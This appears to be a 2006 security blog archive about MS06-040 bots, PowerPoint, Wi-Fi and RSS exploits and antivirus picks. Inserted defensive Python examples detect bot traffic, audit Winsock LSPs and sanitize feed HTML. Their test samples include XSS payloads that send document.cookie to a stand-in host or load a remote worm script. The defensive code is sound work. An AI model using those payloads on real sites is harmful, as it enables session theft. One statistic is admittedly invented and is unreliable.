A Trojan is spreading around the Internet this week that exploits unpatched machines, specifically the MS06-040 Server service vulnerability. Called W32.Wargbot, IRC-Mocbot!MS06-040, W32/Cuebot-L, Backdoor.Win32.IRCBot.st or WORM_IRCBOT.JL by various AV vendors, on infection it immediately calls out over the Internet via IRC and receives instructions to download a spam bot or Trojan called Win32.Ranky.fv. Victims' machines then become mass email spam servers for a large botnet. The victim's machine also keeps checking the IRC command center for additional instructions, which means that the criminal behind this mess can download almost anything, at any time, to your machine.



Silently and without your permission.
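The bot behaviour described above (an inbound hit on the Server service, an outbound IRC connection, then a burst of direct outbound mail) is a pattern you can triage from ordinary firewall or flow logs. The script below is an added example, not code from this post or from any AV vendor. It assumes a constructed, simplified one-connection-per-line log format, treats RFC 1918 addresses as "inside", and uses illustrative port lists and a ten-minute correlation window; none of those figures come from the post. A single IRC connection on its own is deliberately not enough to flag a host.

```python
"""Connection-log triage for the MS06-040 IRC bot described above.

Added example, not code from the original post or from any AV vendor.
Assumptions: a constructed, simplified flow-log format
("timestamp src_ip src_port dst_ip dst_port proto", one connection per line);
RFC 1918 addresses are "inside"; the port lists and the ten-minute
correlation window are illustrative choices, not figures from the post.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORTS = {139, 445}                 # Server service, the MS06-040 attack surface
IRC_PORTS = {6667, 6668, 6669, 7000}   # common IRC C2 ports (assumed list)
SMTP_PORT = 25
SMTP_BURST = 5   # direct outbound SMTP sessions that look like a spam bot, not a user

# Constructed sample log (not real traffic). Text after '#' is an annotation.
SAMPLE_LOG = """\
2006-08-17T09:01:03 203.0.113.7 3421 192.168.1.20 445 TCP      # outside host hits the Server service
2006-08-17T09:01:09 192.168.1.20 1054 198.51.100.9 6667 TCP    # victim joins the IRC command channel
2006-08-17T09:01:30 192.168.1.20 1060 198.51.100.44 80 TCP     # fetches the second-stage payload
2006-08-17T09:02:01 192.168.1.20 1061 192.0.2.10 25 TCP        # spam run begins
2006-08-17T09:02:02 192.168.1.20 1062 192.0.2.11 25 TCP
2006-08-17T09:02:02 192.168.1.20 1063 192.0.2.12 25 TCP
2006-08-17T09:02:03 192.168.1.20 1064 192.0.2.13 25 TCP
2006-08-17T09:02:04 192.168.1.20 1065 192.0.2.14 25 TCP
2006-08-17T09:02:05 192.168.1.20 1066 192.0.2.15 25 TCP
2006-08-17T09:05:00 192.168.1.30 1100 192.168.1.5 25 TCP       # normal user, mail via the internal server
2006-08-17T09:05:10 192.168.1.30 1101 198.51.100.60 80 TCP
2006-08-17T09:06:00 192.168.1.40 1200 198.51.100.9 6667 TCP    # someone just chatting on IRC
"""


def parse_flow(line):
    """One log line -> dict, or None for blank/annotation-only lines."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    ts, src, sport, dst, dport, proto = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "proto": proto.upper()}


def is_internal(ip):
    """RFC 1918 check; adjust to your own address plan."""
    a, b = (int(x) for x in ip.split(".")[:2])
    return a == 10 or (a == 192 and b == 168) or (a == 172 and 16 <= b <= 31)


def find_bots(log_text, window=timedelta(minutes=10)):
    """Return {host: [reasons]} for inside hosts that opened an outbound IRC
    session AND show at least one of the two corroborating signs."""
    inbound_smb = defaultdict(list)
    outbound_irc = defaultdict(list)
    outbound_smtp = defaultdict(list)
    for raw in log_text.splitlines():
        f = parse_flow(raw)
        if f is None or f["proto"] != "TCP":
            continue
        inside_src, inside_dst = is_internal(f["src"]), is_internal(f["dst"])
        if inside_dst and not inside_src and f["dport"] in SMB_PORTS:
            inbound_smb[f["dst"]].append(f["ts"])
        elif inside_src and not inside_dst:
            if f["dport"] in IRC_PORTS:
                outbound_irc[f["src"]].append(f["ts"])
            elif f["dport"] == SMTP_PORT:
                outbound_smtp[f["src"]].append(f["ts"])

    verdicts = {}
    for host, irc_times in outbound_irc.items():
        first_irc = min(irc_times)
        reasons = []
        if any(first_irc - window <= t <= first_irc for t in inbound_smb[host]):
            reasons.append("inbound 139/445 connection from outside shortly before the IRC session")
        spam = [t for t in outbound_smtp[host] if first_irc <= t <= first_irc + window]
        if len(spam) >= SMTP_BURST:
            reasons.append(f"{len(spam)} direct outbound SMTP sessions after joining IRC")
        if reasons:
            verdicts[host] = reasons
    return verdicts


if __name__ == "__main__":
    for host, why in find_bots(SAMPLE_LOG).items():
        print(host)
        for r in why:
            print("  -", r)
```

On the constructed log only 192.168.1.20 is flagged, with both reasons; 192.168.1.40 talks to the same IRC server but shows neither corroborating sign and is left alone. Note that the inbound 139/445 indicator is exactly the traffic a host firewall that blocks those ports removes, so on a well-firewalled network the SMTP burst is the indicator you will actually see.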



Statistics (pulled out of my rear end just now) indicate that typically only 35% of all home or small office Windows users are on Automatic Updates. The rest either update manually - but not always timely, or have never updated at all. This does not include corporate domains, where updates are generally controlled via WSUS or SMS or the like, and are tested then rolled out to end-users on their own schedule.



The potential for damage is great. See my previous posts for links to more information on how to get yourself immunized against the attack.

Tuesday, August 15, 2006

Powerpoint flaw allows remote code execution

Another reason to patch up, but if you use the default settings for Windows Automatic Updates, you may not have this fix installed yet.



This is a serious flaw in Microsoft's PowerPoint, with several Trojans exploiting it already in the wild. One of the more "interesting" flavors is Win32/Fantador.E!Backdoor [Trojan], which installs a Layered Service Provider (LSP) into the victim's Winsock stack and allows complete remote administrative access to the system.
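An LSP is registered in the Winsock catalog, so one practical check after a suspected PowerPoint infection is to dump that catalog and look for layered providers whose DLL does not belong. The script below is an added example, not code from this post or from Microsoft. It assumes the text is what `netsh winsock show catalog` prints on Windows XP/2003 (the field names follow that layout; verify against a real machine), that the system root is C:\WINDOWS, and that the baseline DLL list is a placeholder you would replace with the catalog of a known-clean machine of the same build. Entry 1003 in the sample is a hypothetical rogue provider, not a real malware file name.

```python
r"""Audit the Winsock catalog for Layered Service Providers (LSPs) that do not
belong, the kind of foothold the PowerPoint Trojan above installs.

Added example, not code from the original post or from Microsoft.
Assumptions: the text is what `netsh winsock show catalog` prints on
Windows XP/2003 (field names below follow that layout, verify against a real
machine); the system root is C:\WINDOWS; the baseline DLL list is a guess
and should be taken from a known-clean machine of the same build instead.
"""
import re
from pathlib import PureWindowsPath

# Baseline of Microsoft provider DLLs expected in the catalog (assumed; build your own).
BASELINE_DLLS = {"mswsock.dll", "rsvpsp.dll", "winrnr.dll"}

# Constructed sample. Entry 1003 is a hypothetical rogue LSP, not a real malware file name.
SAMPLE_CATALOG = r"""
Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Base Service Provider
Description:                        MSAFD Tcpip [TCP/IP]
Provider ID:                        {E70F1AA0-AB8B-11CF-8CA3-00805F48A192}
Provider Path:                      %SystemRoot%\system32\mswsock.dll
Catalog Entry ID:                   1001
Version:                            2
Address Family:                     2
Max Address Length:                 16
Min Address Length:                 16
Socket Type:                        1
Protocol:                           6
Protocol Chain Length:              1

Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Layered Service Provider
Description:                        RSVP UDP Service Provider
Provider ID:                        {9D60A9E0-337A-11D0-BD88-0000C082E69A}
Provider Path:                      %SystemRoot%\system32\rsvpsp.dll
Catalog Entry ID:                   1002
Version:                            2
Address Family:                     2
Max Address Length:                 16
Min Address Length:                 16
Socket Type:                        2
Protocol:                           17
Protocol Chain Length:              0

Winsock Catalog Provider Entry
------------------------------------------------------
Entry Type:                         Layered Service Provider
Description:                        Winsock Helper
Provider ID:                        {00000000-0000-0000-0000-000000000000}
Provider Path:                      C:\Documents and Settings\Owner\Local Settings\Temp\lsp_example.dll
Catalog Entry ID:                   1003
Version:                            2
Address Family:                     2
Max Address Length:                 16
Min Address Length:                 16
Socket Type:                        1
Protocol:                           6
Protocol Chain Length:              0
"""

FIELD_RE = re.compile(r"^([A-Za-z ]+?):\s+(.*?)\s*$")


def parse_catalog(text):
    """Split netsh output into one dict of fields per catalog entry."""
    entries = []
    current = None
    for line in text.splitlines():
        if line.startswith("Winsock Catalog Provider Entry"):
            current = {}
            entries.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return entries


def expand_path(path, system_root):
    """Expand %SystemRoot% (case-insensitively) the way the loader would."""
    root = system_root.rstrip("\\")
    return re.sub(r"%systemroot%", lambda _m: root, path, flags=re.IGNORECASE)


def suspicious_lsps(entries, system_root=r"C:\WINDOWS"):
    """Flag layered providers that live outside system32 or are not in the baseline."""
    system32 = PureWindowsPath(system_root) / "system32"
    findings = []
    for e in entries:
        if e.get("Entry Type") != "Layered Service Provider":
            continue
        path = PureWindowsPath(expand_path(e.get("Provider Path", ""), system_root))
        reasons = []
        if path.parent != system32:            # PureWindowsPath compares case-insensitively
            reasons.append(f"DLL lives outside {system32}")
        if path.name.lower() not in BASELINE_DLLS:
            reasons.append("DLL not in the baseline")
        if reasons:
            findings.append({"catalog_id": e.get("Catalog Entry ID"),
                             "description": e.get("Description"),
                             "path": str(path), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_lsps(parse_catalog(SAMPLE_CATALOG)):
        print(f["catalog_id"], f["description"], f["path"])
        for r in f["reasons"]:
            print("  -", r)
```

On the suspect machine, run `netsh winsock show catalog > catalog.txt` and feed the file to `parse_catalog`. Once a rogue DLL has been removed, `netsh winsock reset` on XP SP2 rebuilds a clean catalog (a reboot follows), which is safer than editing the catalog registry keys by hand.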



All versions of PowerPoint are vulnerable until patched, although Microsoft claims that the free PowerPoint 2003 Viewer does not have the flaw. So if you receive an unexpected .ppt file, it may be safer to open it in the viewer rather than in PowerPoint.



The recommended methods to get this patch are:



Visit the Office Update site and install all available updates. You may have to go through the update process several times if you are behind on your Microsoft Office service packs. Repeat until you see that there are no remaining available updates. You may need your original office installation disks handy to successfully complete this process.



If you wish you may upgrade 'Windows Update' to the free 'Microsoft Update Service,' which turns on extended updates on the regular Windows Update site. That will allow you to install updates for Office in addition to the Windows patches from one place. Additionally - by turning on this feature - and if you use Automatic Updates, then Microsoft Office will be included in your automatic update schedule and silent downloads into the future. (Note that if you have already turned on this feature, you will only see the normal Update site when you click the link above.)

Monday, August 14, 2006

Windows flaw already under attack

"The bot, and a second variant detected Sunday, appear to use the Windows Server service flaw (MS06-040) to spread to computers that have not yet been patched for the issue. Microsoft fixed the flaw last week."



Again to all: if you have not yet verified that your Windows system is fully patched as of last week Tuesday - including the ultra-critical MS06-040 security fix - stop what you are doing and get it done now. If your automatic updates are working, then you should be okay.



The good news (so far) is that the attacks seem to be very limited in scope - not like the widespread worms that exploited past flaws.

Thursday, August 10, 2006

Homeland Security says patch your Windows (or else??)

The Department of Homeland Security released a special press release stating that everyone should apply the Microsoft MS06-040 security patch: Vulnerability in Server Service Could Allow Remote Code Execution (921883) released last Tuesday. You can also obtain that patch by ensuring you are updated via Microsoft's Express Update service.



"The Department of Homeland Security (DHS) is recommending that Windows Operating Systems users apply Microsoft security patch MS06-040 as quickly as possible. This security patch is designed to protect against a vulnerability that, if exploited, could enable an attacker to remotely take control of an affected system and install programs, view, change, or delete data, and create new accounts with full user rights.



Windows Operating Systems users are encouraged to avoid delay in applying this security patch. Attempts to exploit vulnerabilities in operating systems routinely occur within 24 hours of the release of a security patch. This vulnerability could impact government systems, private industry and critical infrastructure, as well as individual and home users."






Update 1

CNet reports: "Microsoft has seen a "very limited attack" that already used the newly disclosed flaw, the software maker said Tuesday.



Overnight, some hacker toolkits were updated with code that allows researchers to check for the flaw and exploit it, said Neel Mehta, a security expert at Internet Security Systems in Atlanta.



"This is a very serious vulnerability," Mehta said. "At the moment, this exploit is being used in targeted attacks to compromise specific systems. However, there is nothing about the nature of the vulnerability that prevents it from being used in a much more widespread fashion as part of a worm."






Update 2

It appears that Microsoft may be convinced that the next Really Big Worm - coming soon to a computer near you - will exploit this problem.



It's a good thing that many people now have firewalls that by default block ports 139 and 445. That will help reduce the propagation of any worm looking for this exploitable hole. We shall see . . .

Why commercial reviews of AV products are misleading

Windows Secrets just posted a rant about certain big-name commercial review sites and their lack of testing methodology when ranking Anti-Virus and Counter-Spyware products and suites.



One has to wonder just how objective these places are -- when they are taking huge advertising dollars from the software companies that produce the products they are reviewing?



But the real point revealed by the article is that signature-based protection applications are no longer effective against zero-day attacks. And this last year, it seems that every day has been a zero day . . .



The latest greatest feature to mitigate this problem is so-called "behavioral protection." Certain AV products are adding real time analysis of suspicious actions to catch unknown viruses and malware, even before the signature is updated. Combined with signatures, this method should improve your chances of resisting attacks and new infections.



Only two products have this feature, more will have it in 2007. Those two are:



- Zone Labs OSFirewall

- Panda TruPrevent



Of note is that Zone Labs OSFirewall licenses CA's eTrust Anti-Virus as their virus component in the suite. Yet eTrust was not reviewed at all by these commercial sites. It also happens to be my personal favorite AV protection application based on real-world results for myself, my clients and my last big employer - who started using it on their entire corporate network right after they got "Blasterized" several years ago.

Wednesday, August 9, 2006

Humor: New Microsoft Bug Prevention and Correction Program (WSYP)

A little offbeat geek humor for your viewing pleasure.



Revenge of the end user?

More on the Blackberry handheld exploit

Update!



The malware researcher who announced that Blackberry handhelds could be used to gain access to corporate networks that support services for the device plans to release the exploit code to the public.



"Public" in this case means that script kiddies and online organized crime rings will most certainly pick up the code and begin to use it for their own gain. Hopefully Research in Motion will provide patches to their server products to mitigate the risk.



What should end-users do?



End users need to be very cautious about opening unexpected attachments in email received on their Blackberries - even if those attachments come from known contacts. They should also be sure that their device does not fall into someone else's hands - even for a short time, as the exploit can easily be installed with physical access to the handheld.



On the IT Admin side of the equation:



"By administering the various security tools available in its systems, IT administrators can greatly reduce the potential for any attack by banning or limiting the privileges of various types of applications, company officials said.



"I wouldn't characterize this as a flaw, but the ability to run a program on the network," said Scott Totzke, director of RIM's Global Security Group, in Waterloo, Ontario. "We have tools [that can be used] to manage and control third-party applications, and administrators can close the door to third-party applications completely, or use a whitelist approach that can allow them to be very granular in what they might allow."




So, a question for all you IT folks: have you implemented strong security policies on your Blackberry servers?


Tuesday, August 8, 2006

It's that time . . .


My professional network security and computer consulting resource website is over two years old; it's stale and looks outdated. It's also not very well optimized for search engine placement. (Old theories tried and forgotten.)



I really like the look and feel of slick graphical buttons that change state when you mouse_over and on_click them. It's cool. But it's not good for my search sites, and I am losing out on traffic because I use them. Trouble is, I can't find a decent looking template for text links to pages within, they all turn out cluttered and confusing to the end-user.



One of the "modern" challenges SEO experts face is that internal site links really need to be in text for most search engines to crawl your site properly. If you use buttons, they generally (not always) skip those links. Worse, search engines give preferential treatment to longer descriptive text links like the first link above. They also seem to give higher scores for bold and heading formatted text. These tricks work great for links within the content, but not for site navigation. JavaScript and ActiveX are also out, for similar reasons. Somewhere between is a balance.



How have you solved this issue, assuming any of you have succeeded at reaching a clean looking, easily managed, slick text only navigation system that does not use graphical buttons, Java or ActiveX?

Sunday, August 6, 2006

Got Blackberry? Your network may be 0wn3d

Wired reports that Blackberry handhelds can be used as a backdoor to allow an intruder complete access to any network which "trusts" that Blackberry device.



Users of Blackberry devices should be careful about what attachments they open in their email . . .

Friday, August 4, 2006

The car of my dreams!

Oh. My. Gawd.



I am in serious lust with a cage. (Those that know me may remember that I have never lusted after anything with more than 2 wheels prior to today.)



"The Tesla Roadster has a range of 250 miles, says the company.



The Tesla's lithium-ion batteries can be raised from the dead to a full charge in 3 ½ hours. . . . Tesla will have its own portable charging pack so it won't be range-tethered to its home charging station.



Perhaps most important . . . the Tesla offers fun, in large, hair-raising voltages. The company claims 0 to 60 mph acceleration in 4 seconds and a top speed of 130 mph."




I want one!




Engineers have known for a long time now that electric motors are capable of much higher levels of torque and power than any reciprocating engine ever invented. The problem is not the motors, it's the batteries. If we ever develop a portable electrical source for vehicles, our world will change drastically.



Imagine a car with a high-power motor on each wheel. Heck, the wheel itself would be the rotor for the motor, the inside would be the stator. Done right, you would not need pressure brakes . . . it could all be done electronically, which means better braking and no worn out pads - ever again. It would be the ultimate power horse and all wheel drive.

Blog RSS feeds pose risk to subscribers

And yes! You guessed it, even more cheerful news springing forth from this week's Black Hat Conference in Las Vegas.



Turns out that several software applications that aggregate the popular RSS and Atom feed formats will pass malicious JavaScript through to the user, in some cases bypassing the local system's security settings, which lets the script run with unfettered access to your machine. Attackers can even inject their attack code through the comments of trusted blogs!



"Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said."


( . . . snip . . . )



"A large percentage of the readers I tested had some kind of an issue," he said. In his presentation, Auger listed Bloglines, RSS Reader, RSS Owl, Feed Demon, and Sharp Reader as vulnerable. As protection, people could switch to a nonvulnerable reader. Also, feed publishers could ensure that their feeds don't include malicious JavaScript or any script at all, Auger said. Some services, however, rely on JavaScript to deliver ads in feeds, he noted. "
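The reader-side fix Auger hints at is to never hand feed HTML to the rendering engine as-is. Below is an added example of that approach, not code from this post, from Auger's talk or from any of the readers he named: an allow-list sanitizer that rebuilds a feed item from scratch, keeping only known-harmless tags and attributes, dropping script-bearing elements together with their contents, rejecting `javascript:`-style URLs and re-escaping all text. The tag and attribute allow-lists and the sample comment are constructed for illustration; tune the lists to what your reader actually needs to render.

```python
"""Allow-list sanitizer for feed item HTML, the reader-side fix for the
JavaScript-in-RSS problem described above.

Added example, not code from the original post, from Auger's talk or from any
of the readers he named. The tag and attribute allow-lists and the sample
feed entry are constructed for illustration.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "br", "img",
                "ul", "ol", "li", "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"br", "img"}
# Tags whose *content* must go too, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "applet"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL

# Constructed sample: a blog comment as it would appear inside a feed item's
# description, with the attacker's script and handlers mixed into normal markup.
MALICIOUS_COMMENT = (
    '<p>Great post!</p>'
    '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(document.cookie)" onmouseover="alert(1)">click</a>'
    '<img src="x" onerror="alert(1)">'
    '<p>More <b>text</b> &lt;not a tag&gt;'
)


def safe_url(url):
    """Reject javascript:, data:, vbscript: and anything else not on the list."""
    if url is None:
        return False
    return urlsplit(url.strip()).scheme.lower() in SAFE_SCHEMES


class FeedSanitizer(HTMLParser):
    """Rebuilds the fragment from scratch: only allow-listed tags and attributes
    are emitted, all text is re-escaped, dangerous elements are removed with
    their contents, and the output is always balanced."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []       # open allow-listed tags, for balancing
        self.skip_depth = 0   # >0 while inside script/style/... content

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                      # unknown tag dropped, its text kept
        clean = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                # drops every on* handler, style=, etc.
            if name in URL_ATTRS and not safe_url(value):
                continue
            clean.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(clean)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in self.stack:
            while True:                 # close anything left open inside it
                top = self.stack.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    # Comments, doctype and processing instructions are dropped by default.

    def result(self):
        self.close()
        while self.stack:
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize_feed_html(fragment):
    """Return a safe, balanced HTML fragment for the reader to render."""
    s = FeedSanitizer()
    s.feed(fragment)
    return s.result()


if __name__ == "__main__":
    print(sanitize_feed_html(MALICIOUS_COMMENT))
```

The sample comment comes out as `<p>Great post!</p><a>click</a><img src="x"><p>More <b>text</b> &lt;not a tag&gt;</p>`: the script block, the `javascript:` link and both event handlers are gone, and the unclosed paragraph is closed. Apply this to every untrusted field of an item (title and author included, not just the body), and remember that any reader which renders feeds in a browser control with local-zone privileges still needs that zone locked down, since a sanitizer only helps with the content it is actually run on.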

Do you have my stapler?

Some nights you just wander aimlessly until you find strangeness to soothe the tattered sleepless soul.



I don't know why those stupid links are so damn amusing. Are they really that funny, or am I just in "one of those funky states?"



But then . . . just as one gives up hope for one's sanity, one finds this gem on the same site.



(Warning, possible long load times for the above links.)

Thursday, August 3, 2006

It's not just Wi-Fi drivers being newly exploited . . .

Apparently hackers are going after other system drivers - although the Wi-Fi hack is still one of the more frightening applications.



Your sound, video, and network card drivers are among the next big targets. Not only that, other software agents that are frequently ignored, often unused, but generally running on a default system installation have become the focus of malware developers for the next generation of spyware, rootkits and viruses.



This is why I so often tell people to turn off unused services. Black Viper's site (mirror - his main site appears to be down) has excellent coverage of that topic.

RFID, US Passports and more paranoia

Even more Black Hat Conference goodness for you today.



Wired reports that RFID embedded passports can be cloned, compromised, snooped . . . and worst of all, used as triggers for roadside bombs intended for US passport carrying citizens.



It's enough to make me believe in tin foil hats -- for my passport!

Critical Wi-Fi driver flaws expose laptops to infection

You arrive at your favorite coffee shop, turn on your laptop and order your coffee.  You have not yet connected to the public Wi-Fi hotspot sponsored by the shop.

Suddenly the performance on your laptop drops inexplicably. When you initialize the connection to the Internet, aggressive popups begin appearing almost immediately. Or, unnoticed by you, your files are being uploaded somewhere ... and your keystrokes are being logged as you access your bank statement - even though you use a secure SSL or VPN connection over Wi-Fi.

You've just been infected by a rootkit with a nasty trojan virus piggybacked onto the payload.  And it happened right after you powered up but before you connected to the Internet.  How is this possible?

This scenario is about to come true.

A pair of hackers at the Black Hat conference in Las Vegas demonstrated just such an attack this week, highlighting newly discovered exploits in the drivers for popular Wi-Fi adapters. While their demo was conducted on a Mac PowerBook, they say that any PC with vulnerable Wi-Fi drivers is exposed to this risk. As of this writing, no fixes have been released by any of the major Wi-Fi device companies. The exploit is not yet in the wild - but it's a matter of time. Now that the possibility of this attack is known, we are sure to see it in real life very soon.

More information at Security IT Hub.

I will be watching this closely.

Wednesday, August 2, 2006

"The Cassini spacecraft orbiting Saturn and headed for a series of close encounters with Titan, the planet's largest moon, also appears aimed for an extended stay at the ringed planet, the mission's chief says. "

When I was a kid, I really wanted to be an astronaut.  No, really.

On my 18th birthday, I applied to the Air Force with dreams of becoming a crack pilot, which at that time was the best way to get into the space program as a flying crash-test-dummy.  Imagine my disappointment when I was informed that a) I was too tall and b) color-blind people need not apply.  Would I like a nice position in the USAF as ground crew for runway maintenance?

So I turned to computers.  Was one of the first kids in my town to have unfettered access to PDP-11 workstations at the local university.  I wrote programs that used composition rules to churn out really sick sounding computer generated music.  Vector analysis algorithms to solve stress versus force problems for my physics class.  You get the idea.  Never did get around to obtaining a CS degree (which hurt me later in corporate life).  But experience does count, and while turning a great hobby in computers into a full time career in computer security ruined a good hobby, it's been a rewarding career. 

More later . . ..

The "Nigerian"-style scam letter is reborn?

Disgusting. See for yourself. :(



Beware the 'soldier' offering you riches (Seattle PI)



There appear to be no limits in the depths to which online crooks will stoop.


Social networking sites have (gasp!) open XSS vulnerabilities


Researchers at a well known anti-malware company checked out a few popular social networking sites to see how vulnerable they were. In 30 minutes they discovered more than half a dozen server side "worm-able" Cross Site Scripting (XSS) vulnerabilities.
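The "worm-able" part is what makes stored XSS on a social site different from a reflected link: a comment or profile field that is saved and shown to every visitor can carry a script that re-posts itself from each victim's account. The snippet below is an added example, not code from this post or from any of the sites the researchers tested; the page fragment, field names and worm payload are constructed for illustration. It shows the vulnerable rendering beside the fixed one, encoding each field for the context it lands in (HTML body, attribute, URL), plus the crude self-check a site owner can run: does the stored payload come back out as live markup?

```python
"""Stored XSS in a comment box: the vulnerable rendering beside the fixed one.

Added example, not code from the original post or from any of the sites the
researchers tested. The page fragment, field names and the worm payload are
constructed for illustration.
"""
from html import escape
from urllib.parse import urlsplit

# Constructed worm-style payload: a stored comment that pulls in a remote script.
PAYLOAD = '<script src="http://evil.example/worm.js"></script>'


def render_comment_vulnerable(author, body, homepage):
    """What a 'worm-able' site does: untrusted fields pasted straight into HTML."""
    return (f'<div class="comment"><a href="{homepage}">{author}</a>'
            f'<p>{body}</p></div>')


def safe_href(url):
    """Allow only http(s) links; anything else becomes an inert '#'.
    Quotes are escaped so the value cannot break out of the attribute."""
    url = url.strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return escape(url, quote=True)


def render_comment_safe(author, body, homepage):
    """Same page, with every field encoded for the context it lands in."""
    return (f'<div class="comment"><a href="{safe_href(homepage)}">{escape(author)}</a>'
            f'<p>{escape(body)}</p></div>')


def reflects_payload(rendered, payload=PAYLOAD):
    """Self-check: does the stored payload come back out as live markup?"""
    return payload in rendered


if __name__ == "__main__":
    for render in (render_comment_vulnerable, render_comment_safe):
        html = render("mallory", PAYLOAD, 'http://x.example/" onmouseover="alert(1)')
        print(render.__name__, "reflects payload:", reflects_payload(html))
        print("   ", html)
```

The vulnerable version echoes the `<script>` tag and also lets the homepage field close the `href` attribute and add an `onmouseover` handler; the safe version turns both into harmless text. Output encoding on every field is the fix here, not input filtering on the way in, because the same stored value is rendered in several contexts and filters are routinely bypassed.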



What can end users do?



1) Patch your operating systems! Windows users should be aware that Microsoft generally releases critical updates on the second Tuesday of each month. Setting your automatic updates to check once per week (the longest interval the UI allows) is a great idea. I recommend selecting Wednesday, early in the morning before your work day starts. Leave your machine on Tuesday night . . .



2) Subscribe to good anti-virus protection



3) Subscribe to Malware/Spyware/Adware protection




AntiVirus products that tested well in recent reviews:

- eTrust 8.1 Corporate (Not the home or personal version.)

- Kaspersky

- NOD32

- F-Secure



Some not so good choices:

Symantec AV (over 30% tested infection rate with current signatures)

McAfee AV (over 33% infection rates, plus exploitable holes in their update service.)



While the two products above hold the largest market share, they offer abysmal protection. They are also system resource pigs. I tell friends who ask me which engine to choose that these two products will turn a perfectly good Pentium IV machine into a PII . . .



Malware Real Time Protection - Best products in order of effectiveness

- Sunbelt Software's CounterSpy (cousin of Windows AntiSpyware Beta 1 and distant relative of Windows Defender Beta - but much better!)

- Spysweeper



Malware scanners

Spybot Search & Destroy

Adaware Personal



(Links from this article will open a new browser window.)